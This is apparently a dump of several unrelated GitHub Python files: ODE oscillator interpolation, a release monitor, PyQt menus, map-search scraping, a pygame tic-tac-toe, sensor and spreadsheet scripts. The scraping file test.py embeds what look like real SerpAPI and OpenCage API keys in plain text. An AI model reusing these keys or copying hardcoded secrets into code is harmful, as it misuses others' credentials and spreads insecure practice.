FONCTIONS POUR LE MAIN #########################################################################\n###################################################################################################################################################\n\n\n#--------------------------- FONCTION VECTEURS DERIVES -------------------------\ndef deriv(Z,t,delta,beta,omega,alpha,gamma):\n dX = Z[1]\n dY = -delta*Z[1] - alpha*Z[0] - beta*(Z[0])**3 + gamma*np.cos(omega*t)\n dZ = [dX,dY]\n return dZ\n#-------------------------------------------------------------------------------\n\n#----------------------------- SOLUTION DE L'EDO -------------------------------\ndef solu_oscillateur(Z,t,delta,beta,omega,alpha,gamma):\n #sol est de taille(N,2) ---> ka ===la premiere colonne est la solution\n #et la seconde sa derivée.\n sol = odeint(deriv, Z, t, args = (delta,beta,omega,alpha,gamma))\n return sol\n#-------------------------------------------------------------------------------\n\n#------------------------------ FONCTION CREATION BASE GAMMA_I -----------------\n\ndef base_gamma(Z,t,delta,beta,omega,alpha,gamma):\n N = np.size(alpha)\n BASE = np.zeros((np.size(t),N))\n for i in range(N):\n SOL = solu_oscillateur(Z,t,delta,beta,omega,alpha[i],gamma)\n BASE[:,i] = SOL[:,0]\n return BASE\n#-------------------------------------------------------------------------------\n\n#----------------------------- AFFICHAGE ---------------------------------------\ndef affichage(t,sol):\n\n fig = plt.figure(figsize = [7,7])\n ax = fig.add_subplot(111)\n ax.plot(sol[:,0], sol[:,1], 'b', label = 'x(t)')\n plt.xlabel(\"t\")\n plt.ylabel(\"x(t)\")\n plt.title(\"Oscillateur de Duffing\")\n\n plt.show()\n#-------------------------------------------------------------------------------\n\n#------------------------ FONCTION DE PROJECTION DE V SUR U --------------------\ndef proj(v,u):\n\n proj = np.dot(v,u)*u\n\n return proj\n#-------------------------------------------------------------------------------\n\n#------------------------- ORTHONORMALISATION SELON SEUIL ----------------------\ndef orthonormalisation(MATRIX, nbr_vect):\n\n N = np.shape(MATRIX)[0]\n k = np.shape(MATRIX)[1]\n\n ortho = []\n norm = []\n indice = []\n x_gamma = MATRIX[:,0]\n e = x_gamma/np.linalg.norm(x_gamma)\n ortho.append(e)\n\n for i in range(1,k):\n v = MATRIX[:,i]\n sum = np.zeros(N)\n\n for i in range(len(ortho)):\n sum += proj(v,ortho[i])\n\n u = v - sum\n norm.append(np.linalg.norm(u))\n e = u/np.linalg.norm(u)\n ortho.append(e)\n\n if nbr_vect > len(norm) + 1:\n print(\"ERREUR, veuillez saisir un nombre moins important de vecteurs de base à conserver\")\n sys.exit()\n else:\n m = 0\n while m < nbr_vect - 1:\n indice.append(norm.index(min(norm)))\n norm[norm.index(min(norm))] = max(norm)\n m = m + 1\n\n ORTHO = np.zeros((N, nbr_vect))\n ORTHO[:, 0] = ortho[0]\n for i in range(len(indice)):\n ORTHO[:, i+1] = ortho[indice[i]+1]\n\n return ORTHO\n\n#-------------------------------------------------------------------------------\n\n#------------------------- CALCUL ERREUR ENTRE SOL EXACTE ET PROJETEE ----------\ndef erreur_moy_HF(INIT,Z,t,delta,beta,omega,alpha,gamma):\n\n PROJ = np.dot(INIT,np.transpose(INIT))\n N = np.size(alpha)\n erreur = 0\n for i in range(N):\n SHF = solu_oscillateur(Z,t,delta,beta,omega,alpha[i],gamma)\n SOL = SHF[:,0]\n erreur += np.linalg.norm(SOL - np.dot(PROJ,SOL))\n\n return erreur/N\n\n#-------------------------------------------------------------------------------\n\n###################################################################################################################################################\n################################################## FONCTIONS POUR L'INTERPOLATION VIA LES GEODESIQUES #############################################\n###################################################################################################################################################\n\ndef solution_val_lim(PHI, PSY, t):\n\n U, SIGMA, V_T = svd(PHI, PSY)\n\n V = np.transpose(V_T)\n N = np.shape(SIGMA)[0]\n\n COS_T_SIGMA = np.zeros((N,N))\n SIN_T_SIGMA = np.zeros((N,N))\n\n for i in range(N):\n COS_T_SIGMA[i, i] = np.cos(t*SIGMA[i,i])\n SIN_T_SIGMA[i, i] = np.sin(t*SIGMA[i,i])\n\n #SOLUTION DE LA FORME : GAMMA(t) = GAMMA(0).V.cos(SIGMA*t) + U.sin(SIGMA*t)\n P1 = np.dot(np.dot (PHI,V), COS_T_SIGMA)\n P2 = np.dot(U, SIN_T_SIGMA)\n\n GAMMA_t = P1 + P2\n\n return GAMMA_t\n\n\ndef svd(PHI, PSY):\n\n PHI_PHI_T = np.dot(PHI, np.transpose(PHI))\n N = np.shape(PHI_PHI_T)[0]\n I = np.eye(N)\n PHI_T_PSY = np.dot(np.transpose(PHI) , PSY)\n INV_PHI_T_PSY = np.linalg.inv(PHI_T_PSY)\n\n #INITIALISATION DE LA MATRICE SUR LEQUEL ON VA FAIRE LA SVD\n POUR_SVD = np.dot( np.dot( I - PHI_PHI_T , PSY ), INV_PHI_T_PSY )\n\n #SVD (ATTENTION : LE SIGMA SORTANT DE np.linalg.svd EST UN VECTEUR (k,))\n U, tnSIGMA, V_T = np.linalg.svd(POUR_SVD, full_matrices = False)\n\n SIGMA = np.arctan(tnSIGMA)\n\n #LE VECTEUR SIGMA TRANSFORME EN MATRICE (k,k)\n SIGMA = np.diag(SIGMA)\n\n return U, SIGMA, V_T\n\n\ndef gram_schmidt(X):\n Q, R = np.linalg.qr(X, mode = 'reduced')\n return Q\n","repo_name":"mnastorg/CR_INTERPOLATION_PROJ_MOD","sub_path":"CODES/oscillateur_duffing_2.py","file_name":"oscillateur_duffing_2.py","file_ext":"py","file_size_in_byte":10243,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39925919631","text":"#!/usr/bin/env python\nimport yaml\nfrom github import Github\nfrom tinydb import TinyDB, Query\nimport os\nfrom datetime import datetime\nfrom discord_webhook import DiscordWebhook as DWH\nDISCORD_URL = os.getenv(\"DISCORD_URL\")\nGH_TOKEN = os.getenv(\"GH_TOKEN_KEY\")\ndb = TinyDB('db.json')\nif __name__ == \"__main__\":\n now = datetime.now()\n discord = DWH(url = DISCORD_URL)\n g = Github(GH_TOKEN)\n log_file = open(\"monitor.log\",\"w\")\n print(f'Started at {now.strftime(\"%d/%m/%Y %H:%M:%S\")}', file = log_file)\n with open(\"git_repos.yml\") as yml_file:\n repos = yaml.load(yml_file, Loader=yaml.FullLoader)\n software = Query()\n for repo in repos:\n software_name = db.search(software.name == repo)\n #github\n rp = g.get_repo(repo)\n rls = rp.get_latest_release()\n if len(software_name) == 0:\n db.insert({'name': repo, 'version': rls.tag_name, 'date': str(rls.published_at)})\n else:\n if software_name[0]['version'] != rls.tag_name:\n db.update({'version': rls.tag_name}, software.name == repo)\n print(f\"{software_name[0]['name']} has new release {rls.tag_name}\", file = log_file)\n discord.content = f\":arrow_right: New realese: **{software_name[0]['name']}** **{rls.tag_name}** at {rls.published_at}\"\n discord.execute()\n else:\n print(\n f\"{repo} has no update. Its current version is {rls.tag_name} released on {rls.published_at}\", file=log_file)\n # discord.content = f\"**{repo}** has no update. Its current version is **{rls.tag_name}** released on {rls.published_at}\"\n # discord.execute()\n log_file.close()\n","repo_name":"thanhleviet/monitor_github_release","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42940823212","text":"from PyQt5 import QtGui, QtWidgets\r\nfrom fbxConvert import Ui_FbxConverter\r\nfrom skymapConverter import Ui_SkymapConverter\r\nfrom skinConverter import Ui_SkinConverter\r\nfrom texturesConverter import Ui_TexturesConverter\r\nfrom managerPaths import Paths\r\nfrom staticMethods import StaticMethods\r\n\r\nclass Ui_Converters(object):\r\n def __init__(self, win, app):\r\n self.app = app\r\n self.converters = win\r\n self.setupUi(self.converters)\r\n self.converters.show()\r\n\r\n def openWindow(self, ui):\r\n self.win = QtWidgets.QMainWindow()\r\n if ui == Ui_FbxConverter:\r\n Ui_FbxConverter(self.win, self.app)\r\n elif ui == Ui_SkymapConverter:\r\n Ui_SkymapConverter(self.win, self.app)\r\n elif ui == Ui_SkinConverter:\r\n Ui_SkinConverter(self.win, self.app)\r\n elif ui == Ui_TexturesConverter:\r\n Ui_TexturesConverter(self.win, self.app)\r\n\r\n def setupUi(self, converters):\r\n converters.resize(300, 200)\r\n converters.setObjectName('convertersWindow')\r\n converters.setWindowTitle('converters')\r\n\r\n self.centralwidget = QtWidgets.QWidget(converters)\r\n self.centralwidget.setObjectName('centralwidget')\r\n\r\n self.centralLayout = QtWidgets.QGridLayout(self.centralwidget)\r\n self.centralLayout.setObjectName('centralLayout')\r\n self.centralLayout.setContentsMargins(20, 20, 20, 20)\r\n\r\n self.fbxToGlbButton = QtWidgets.QPushButton()\r\n self.fbxToGlbButton.setObjectName('fbxToGlbButton')\r\n self.fbxToGlbButton.setText('FBX to GLB\\nConverter')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.fbxToGlbButton.setFont(font)\r\n self.fbxToGlbButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\r\n QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.fbxToGlbButton.clicked.connect(lambda: self.openWindow(Ui_FbxConverter))\r\n self.centralLayout.addWidget(self.fbxToGlbButton, 0, 0)\r\n\r\n self.skymapButton = QtWidgets.QPushButton()\r\n self.skymapButton.setObjectName('skymapButton')\r\n self.skymapButton.setText('Skymap\\nConverter')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.skymapButton.setFont(font)\r\n self.skymapButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\r\n QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.skymapButton.clicked.connect(lambda: self.openWindow(Ui_SkymapConverter))\r\n self.centralLayout.addWidget(self.skymapButton, 0, 1)\r\n\r\n self.skinButton = QtWidgets.QPushButton()\r\n self.skinButton.setObjectName('skinButton')\r\n self.skinButton.setText('Skin\\nConverter')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.skinButton.setFont(font)\r\n self.skinButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\r\n QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.skinButton.clicked.connect(lambda: self.openWindow(Ui_SkinConverter))\r\n self.centralLayout.addWidget(self.skinButton, 1, 0)\r\n\r\n self.texturesButton = QtWidgets.QPushButton()\r\n self.texturesButton.setObjectName('texturesButton')\r\n self.texturesButton.setText('Textures\\nConverter')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.texturesButton.setFont(font)\r\n self.texturesButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\r\n QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.texturesButton.clicked.connect(lambda: self.openWindow(Ui_TexturesConverter))\r\n self.centralLayout.addWidget(self.texturesButton, 1, 1)\r\n\r\n self.centralwidget.setLayout(self.centralLayout)\r\n\r\n\r\n converters.setCentralWidget(self.centralwidget)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n win = QtWidgets.QMainWindow()\r\n Paths.getDir('Release')\r\n Ui_Converters(win)\r\n win.show()\r\n sys.exit(app.exec_())","repo_name":"AntonElkin1996/assets_manager","sub_path":"converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18576551772","text":"def get_serp_results(request):\n # Serp API endpoint and parameters\n api_key = 'ab5c8496b40ee68d2b887dc8587cdb62b0f538ad87b479ae1374280242ef084c'\n query = request.GET.get('q', '') # Get the query entered by the user\n search_engine = 'google_maps'\n num_results = 30 # Number of results to retrieve\n\n # Extract the number and location from the query using regular expressions\n number_match = re.search(r'\\b(\\d+)\\b', query)\n location_match = re.search(r'in\\s+([^,]+)', query)\n\n number = int(number_match.group(1)) if number_match else num_results\n location = location_match.group(1).strip() if location_match else '' # Default location if not specified\n\n map_results = [] # List to store all the results\n \n # Perform pagination to retrieve the desired number of results\n start = 0\n while number > 0:\n # Adjust the start value to be a multiple of 20\n start = (start // 20) * 20\n \n # Calculate the number of results to request for this iteration\n results_per_page = min(number, 20)\n \n # Create the API URL with the updated start value and number of results\n url = f\"https://serpapi.com/search.json?engine={search_engine}&q={query}&location={location}&start={start}&num={results_per_page}&api_key={api_key}\"\n print(url)\n try:\n response = requests.get(url)\n data = response.json()\n # Extract the local results from the response\n local_results = data.get('local_results', [])\n \n # Append the local results to the main results list\n map_results.extend(local_results)\n except requests.RequestException as e:\n # Handle request exception\n map_results = []\n break\n \n number -= results_per_page\n start += results_per_page\n\n return map_results\n\n\n\n\n\n\n\n# somehat working while to load multiple results \ndef get_serp_results(request):\n \n # Serp API endpoint and parameters\n global map_results \n map_results= []\n start = 0\n api_key = '002ae278dd8df72fa9a4125af4e40c9c5fcc96cae780f08de4a1d48b5d3fac86'\n # '91039cff9059ebf9f60e7189fe10ac358d028eacb52e4bde52831b17a2314f77' - zep.peg\n query = request.GET.get('q', '') \n search_engine = 'google_maps'\n num_results = 20\n\n number_match = re.search(r'\\b(\\d+)\\b', query)\n location_match = re.search(r'in\\s+([^,]+)', query)\n\n number = int(number_match.group(1)) if number_match else num_results\n location = location_match.group(1).strip() if location_match else '' # Default location if not specified\n \n #Open cage API parameters\n q = location\n key = 'be3984f8e5a042abbf6af3a3a8d5c604'\n geo_url = f\"https://api.opencagedata.com/geocode/v1/json?q={q}&key={key}&language=en\"\n try:\n response_geo = requests.get(geo_url)\n data_geo = response_geo.json()\n lat = data_geo[\"results\"][0][\"geometry\"][\"lat\"]\n lng = data_geo[\"results\"][0][\"geometry\"][\"lng\"]\n ll = f\"@{lat},{lng},20z\"\n except requests.RequestException as e:\n # Handle request exception\n data_geo = None\n \n \n # url = f\"https://serpapi.com/search.json?engine={search_engine}&q={query}&api_key={api_key}\"\n while len(map_results) < number:\n remaining_results = number - len(map_results) # Calculate the remaining number of results needed\n batch_size = min(20, remaining_results)\n url = f\"https://serpapi.com/search.json?engine={search_engine}&q={query}&api_key={api_key}&start={start}&ll={ll}\"\n try:\n response = requests.get(url)\n data = response.json()\n batch_results = data.get('local_results', [])\n map_results.extend(batch_results)\n start += batch_size\n except requests.RequestException as e:\n break\n \n map_results = map_results[:number]\n return map_results","repo_name":"IshanPatle/pyScrapper","sub_path":"scrapper/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12077049096","text":"import pygame;\nfrom sys import exit\npygame.init();\n\nscreen = pygame.display.set_mode((700, 400));\nscreen.fill(\"#1F2026\")\nclock = pygame.time.Clock();\nFPS = 60;\nturn = \"x\";\ngameWon = False;\nwhoWon = \"\";\ndraw = False;\npieces = 0;\nwonLinePos = [(0,0),(700,400)]\n\ngame = [\n [\"\", \"\", \"\"], \n [\"\", \"\", \"\"],\n [\"\" ,\"\", \"\"]\n]\ndef DrawWireFrame():\n global screen;\n thickness = 16\n color = \"#3A3A3A\"\n pygame.draw.line(screen, color, (250,50), (250, 350), thickness);\n pygame.draw.line(screen, color, (150,50), (150, 350), thickness);\n pygame.draw.line(screen, color, (50,150), (350, 150), thickness);\n pygame.draw.line(screen, color, (50,250), (350, 250), thickness);\n\ndef CreateIcon(pos):\n global symbol, turn, game, pieces; \n gameIndex = (int(pos[0]/100),int(pos[1]/100))\n print(turn);\n\n if(gameWon == True or draw == True): return;\n if(game[gameIndex[0] - 1][gameIndex[1] - 1] == \"\"):\n pieces += 1;\n game[gameIndex[0] - 1][gameIndex[1] - 1] = turn;\n symbol.add(Symbol(pos, turn));\n\n CheckGame();\n if(turn == \"x\"): turn = \"0\";\n else: turn = \"x\";\n print(game);\n\ndef CheckGame():\n global game, turn, gameWon, whoWon, draw;\n gameWon = False;\n won = False;\n\n # Check Vertical\n for i in range(3):\n if((game[i][0] == game[i][1] == game[i][2]) and game[i][0]!=\"\"):\n print(f\"x = {i}\")\n wonLinePos[0] = ((i+1) * 100, 1 *100);\n wonLinePos[1] = ((i+1) * 100, 3*100);\n won = True;\n \n #Check Horizontal\n for i in range(3):\n if((game[0][i] == game[1][i] == game[2][i]) and game[0][i]!=\"\"):\n wonLinePos[0] = (1 * 100, (i+1) * 100);\n wonLinePos[1] = (3 * 100, (i+1) * 100);\n won = True;\n\n # Check Diagonal \n if(game[0][0] == turn and game[1][1] == turn and game[2][2] == turn):\n won = True\n wonLinePos[0] = (1 * 100, 1 * 100);\n wonLinePos[1] = (3 * 100, 3 * 100);\n elif(game[0][2] == turn and game[1][1] == turn and game[2][0] == turn):\n wonLinePos[0] = (3 * 100, 1 * 100);\n wonLinePos[1] = (1 * 100, 3 * 100);\n won = True;\n\n if(won == True):\n gameWon = True;\n whoWon = turn;\n return;\n\n # Check Draw\n if(pieces == 9): \n draw = True;\n return;\n return False\n\nclass Text(pygame.sprite.Sprite):\n def __init__(self, text, size, pos, fontfamily = \"pixel.ttf\"):\n super().__init__();\n self.font = pygame.font.Font(f\"Assets/{fontfamily}\", size);\n self.image = self.font.render(text, False, \"#757575\");\n self.rect = self.image.get_rect(center = pos);\n def kill(self):\n self.kill();\n\nclass RectButton(pygame.sprite.Sprite):\n def __init__(self,pos,callbalck):\n super().__init__();\n # self.size = pygame.Rect(());;\n # self.image = pygame.draw.rect(screen, \"red\", self.size);\n self.image = pygame.image.load(\"Assets/square.png\");\n self.image.fill(\"#1F2026\")\n self.pos = pos;\n self.rect = self.image.get_rect(center = self.pos);\n self.callback = callbalck\n\n def update(self, events):\n for event in events:\n if(event.type == pygame.MOUSEBUTTONUP):\n if(self.rect.collidepoint(event.pos)):\n self.callback(self.pos);\n\nclass Symbol(pygame.sprite.Sprite):\n def __init__(self, pos, type):\n super().__init__();\n\n self.font = pygame.font.Font(f\"Assets/pixel.ttf\", 96);\n if(type == \"x\"):\n self.image = self.font.render(\"X\", False, \"#757575\");\n else: self.image = self.font.render(\"O\", False, \"#757575\");\n self.rect = self.image.get_rect(center = pos);\n\nbutton = pygame.sprite.Group();\n\n# DRAW BUTTONS\nbutton.add(RectButton((100,100), CreateIcon));\nbutton.add(RectButton((100,200), CreateIcon));\nbutton.add(RectButton((100,300), CreateIcon));\n\nbutton.add(RectButton((200,100), CreateIcon));\nbutton.add(RectButton((200,300), CreateIcon));\nbutton.add(RectButton((200,200), CreateIcon));\n\nbutton.add(RectButton((300,100), CreateIcon));\nbutton.add(RectButton((300,300), CreateIcon));\nbutton.add(RectButton((300,200), CreateIcon));\n\n\nsymbol = pygame.sprite.Group();\n\n\ntext = pygame.sprite.Group();\nwonText = \"\";\nwhile True:\n events = pygame.event.get();\n for event in events:\n if(event.type == pygame.QUIT):\n pygame.quit();\n exit();\n if(event.type == pygame.KEYDOWN):\n if(event.key == pygame.K_r):\n gameWon = False;\n draw = False;\n game = [\n [\"\", \"\", \"\"], \n [\"\", \"\", \"\"],\n [\"\" ,\"\", \"\"]\n ];\n symbol.empty();\n pieces = 0;\n whoWon = \"\"\n turn = \"x\"\n text.empty();\n screen.fill(\"#1F2026\")\n \n button.draw(screen);\n button.update(events);\n\n symbol.draw(screen);\n symbol.update();\n \n text.add(Text(\"Tic Tac Toe\", 64, (530,100)))\n DrawWireFrame();\n if(gameWon == True or draw == True):\n if (draw == True): \n wonText = text.add(Text(f\"Draw\", 64, (530,200)));\n elif(gameWon == True):\n pygame.draw.line(screen, \"#eeeeee\", wonLinePos[0], wonLinePos[1], 20)\n text.add(Text(f\"{whoWon} won\", 64, (530,200)));\n text.draw(screen);\n \n\n pygame.display.update();","repo_name":"h3nrey/TicTacToePy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69861131308","text":"from sys import*\ninput = stdin.readline\nn,m,x,y,k=map(int,input().split())\na=[];dice=[0]*6\ndd=[(0,0),(0,1),(0,-1),(-1,0),(1,0)] #1번부터 RLUD\ndirect = [[0], #0이 바닥, 5천장으로 고정했을때 바뀌는 방향들\n [2, 1, 5, 0, 4, 3],\n [3, 1, 0, 5, 4, 2],\n [1, 5, 2, 3, 0, 4],\n [4, 0, 2, 3, 5, 1]]\nfor i in range(n):\n a.append(list(map(int,input().split())))\nmove = list(map(int,input().split()))\n\n#0바닥, 5천장\ntemp=[0]*6\nfor d in move:\n dx, dy = dd[d]\n nx, ny = x+dx, y+dy\n if nx<0 or ny<0 or nx>n-1 or ny>m-1: continue\n for i in range(6):\n temp[i] = dice[direct[d][i]]\n for i in range(6):\n dice[i] = temp[i]\n if a[nx][ny]:\n dice[0] = a[nx][ny]\n a[nx][ny] = 0\n else:\n a[nx][ny] = dice[0]\n x, y = nx, ny\n print(dice[5])\n","repo_name":"alb7979s/boj","sub_path":"삼성기출/14499_주사위굴리기.py","file_name":"14499_주사위굴리기.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21456608346","text":"from gpiozero import MotionSensor, Device\nfrom signal import pause\nimport time\n\npir_1 = MotionSensor(23, sample_rate=10, queue_len=40,threshold=0.2)\npir_2 = MotionSensor(24, sample_rate=10, queue_len=40,threshold=0.2)\n\n# pir.when_motion = lambda: print(\"Motion detected!\")\n# pir.when_no_motion = lambda: print(\"All is quiet...\")\n\nwhile True:\n if pir_1.motion_detected:\n print(\"pir_1 detected!\")\n\n elif pir_2.motion_detected:\n print(\"pir_2 detected!\")\n else:\n print(\"_________________\")\n # time.sleep(1)\n\npause()\n\n\n","repo_name":"here-and-now/homepi","sub_path":"pir.py","file_name":"pir.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13199222881","text":"import pandas as pd\r\nimport numpy as np\r\nDRollout=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Rollout_Status.xlsx\",sheet_name='Rollout data')\r\nDRollout['Date'] = pd.to_datetime(DRollout['Date'])\r\nDRollout['Date']=DRollout['Date'].dt.strftime('%m/%d/%y')\r\nCon_dms=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Total_Rollout_Status.xlsx\",sheet_name='Rollout data')\r\nCon_dms1=pd.merge(DRollout,Con_dms,left_on='Code',right_on='Distributor SAP Code',how='left')\r\nCon_dms1['Distributor SAP Code']=Con_dms1['Distributor SAP Code'].fillna(0)\r\nCon_dms1=Con_dms1[Con_dms1['Distributor SAP Code']==0]\r\nCon_dms1=Con_dms1[['Code','Division',\"Distributor's Name\",'Status','Remarks','Date']]\r\nCon_dms1['Date1']=Con_dms1['Date']\r\nCon_dms1=Con_dms1.rename(columns={'Code':'Distributor SAP Code','Division':'Biz (B2B or B2C)',\"Distributor's Name\":'Distributors Name','Status':'Current status','Date':'Installation Start','Remarks':'Daily Status','Date1':'Date Daily Status'})\r\nCon_dms2=pd.concat([Con_dms,Con_dms1],axis=0)\r\nak1=DRollout[['Code','Status']]\r\nak1=ak1.rename(columns={'Code':'Distributor SAP Code','Status':'Current status'})\r\nak3=pd.merge(Con_dms2,ak1,left_on='Distributor SAP Code',right_on='Distributor SAP Code',how='left')\r\nak3['Current status_y']=ak3['Current status_y'].fillna(0)\r\nak31=ak3[ak3['Current status_y']==0]\r\nak32=ak3[ak3['Current status_y']!=0]\r\nak32=ak32.rename(columns={'Current status_y':'Current status'})\r\nak31=ak31.rename(columns={'Current status_x':'Current status'})\r\nak31=ak31[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status','Date Daily Status','Daily Status']]\r\nak32=ak32[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status','Date Daily Status','Daily Status']]\r\nak3=pd.concat([ak32,ak31],axis=0)\r\nak3['Current status']=ak3['Current status'].replace({'Done':'Complete'})\r\nak4=DRollout[['Code','Date']]\r\nak4=ak4.rename(columns={'Code':'Distributor SAP Code','Date':'Installation End'})\r\nak5=ak3[ak3['Current status']=='Complete']\r\nak6=pd.merge(ak5,ak4,left_on='Distributor SAP Code',right_on='Distributor SAP Code',how='left')\r\nak6['Installation End_y']=ak6['Installation End_y'].fillna(0)\r\nak61=ak6[ak6['Installation End_y']==0]\r\nak62=ak6[ak6['Installation End_y']!=0]\r\nak62=ak62.rename(columns={'Installation End_y':'Installation End'})\r\nak61=ak61.rename(columns={'Installation End_x':'Installation End'})\r\nak61=ak61[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status']]\r\nak62=ak62[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status']]\r\nak6=pd.concat([ak62,ak61],axis=0)\r\nak6['Date Daily Status']=\"\"\r\nak6['Daily Status']=\"\"\r\nak7=ak3[ak3['Current status']!='Complete']\r\nak8=DRollout[['Code','Date','Remarks']]\r\nak8=ak8.rename(columns={'Code':'Distributor SAP Code','Date':'Date Daily Status','Remarks':'Daily Status'})\r\nak9=pd.merge(ak7,ak8,left_on='Distributor SAP Code',right_on='Distributor SAP Code',how='left')\r\nak9['Date Daily Status_y']=ak9['Date Daily Status_y'].fillna(0)\r\nak91=ak9[ak9['Date Daily Status_y']==0]\r\nak92=ak9[ak9['Date Daily Status_y']!=0]\r\nak92=ak92.rename(columns={'Date Daily Status_y':'Date Daily Status','Daily Status_y':'Daily Status'})\r\nak91=ak91.rename(columns={'Date Daily Status_x':'Date Daily Status','Daily Status_x':'Daily Status'})\r\nak91=ak91[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status','Date Daily Status','Daily Status']]\r\nak92=ak92[['Biz (B2B or B2C)','Distributor SAP Code','Distributors Name','Installation Start','Installation End','Current status','Date Daily Status','Daily Status']]\r\nak9=pd.concat([ak92,ak91],axis=0)\r\nak10=pd.concat([ak6,ak9],axis=0)\r\nak10['Installation Start'] =pd.to_datetime(ak10['Installation Start'])\r\nak10=ak10.rename(columns={'Distributor Name':'Distributors Name'})\r\nak10.sort_values(by=['Distributor SAP Code'])\r\nRollout=ak10[ak10['Current status']=='Complete']\r\nSap=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\SAPT.xlsx\")\r\nMap=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Mapped.xlsx\")\r\nSync=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Sync.xlsx\")\r\nTally=pd.read_excel(r\"C:\\Users\\UAKHPAL\\OneDrive - BUNGE\\Desktop\\DBMS mapping darta\\Daily Rollout Working files\\Tally.xlsx\")\r\nTally=Tally[['Distributors Code']]\r\nTally=Tally.drop_duplicates(subset=['Distributors Code'],keep='first')\r\nSap1=Sap[['Sold To Party','Sold To Party Name']]\r\nSap1=Sap1.drop_duplicates(subset=['Sold To Party'],keep='first')\r\nRollout=pd.merge(Rollout,Sap1,left_on='Distributor SAP Code',right_on='Sold To Party',how='left')\r\nSync1=Sync[['Distributor Code','Distributor Name']]\r\nSync1=Sync1.drop_duplicates(subset=['Distributor Code'],keep='first')\r\nRollout=pd.merge(Rollout,Sync1,left_on='Distributor SAP Code',right_on='Distributor Code',how='left')\r\nRollout=Rollout.rename(columns={'Distributor Name':'Sync Distributor Name'})\r\nMap1=Map[['Distributor Code','Distributor Name']]\r\nMap1=Map1.drop_duplicates(subset=['Distributor Code'],keep='first')\r\nRollout=pd.merge(Rollout,Map1,left_on='Distributor SAP Code',right_on='Distributor Code',how='left')\r\nRollout=Rollout.rename(columns={'Sold To Party Name':'Sap Distributor Name','Distributor Name':'DMS Distributor Name'})\r\nRollout=Rollout[['Distributor SAP Code','Biz (B2B or B2C)',\"Distributors Name\",'Current status','Installation Start','Installation End','Sap Distributor Name','Sync Distributor Name','DMS Distributor Name']]\r\nSap2=pd.merge(Sap,Rollout,left_on='Sold To Party',right_on='Distributor SAP Code',how='left')\r\nSap2=Sap2.drop(columns=['Biz (B2B or B2C)',\"Distributors Name\",'Current status','Sap Distributor Name','Sync Distributor Name','DMS Distributor Name'])\r\nSap2['Distributor SAP Code']=Sap2['Distributor SAP Code'].fillna(0)\r\nSap2=Sap2[Sap2['Distributor SAP Code']!=0]\r\nSap2=Sap2.drop(columns=['Distributor SAP Code'])\r\nMap2=pd.merge(Map,Rollout,left_on='Distributor Code',right_on='Distributor SAP Code',how='left')\r\nMap2=Map2.drop(columns=['Biz (B2B or B2C)','Distributors Name','Current status','Sap Distributor Name','Sync Distributor Name','DMS Distributor Name'])\r\nMap2['Distributor SAP Code']=Map2['Distributor SAP Code'].fillna(0)\r\nMap2=Map2[Map2['Distributor SAP Code']!=0]\r\nMap2=Map2.drop(columns=['Distributor SAP Code'])\r\nSap2['Code-Mat']=Sap2['Sold To Party'].astype(str)+Sap2['Material'].astype(str)\r\nMap2['Code-Mat1']=Map2['Distributor Code'].astype(str)+Map2['DMS Item 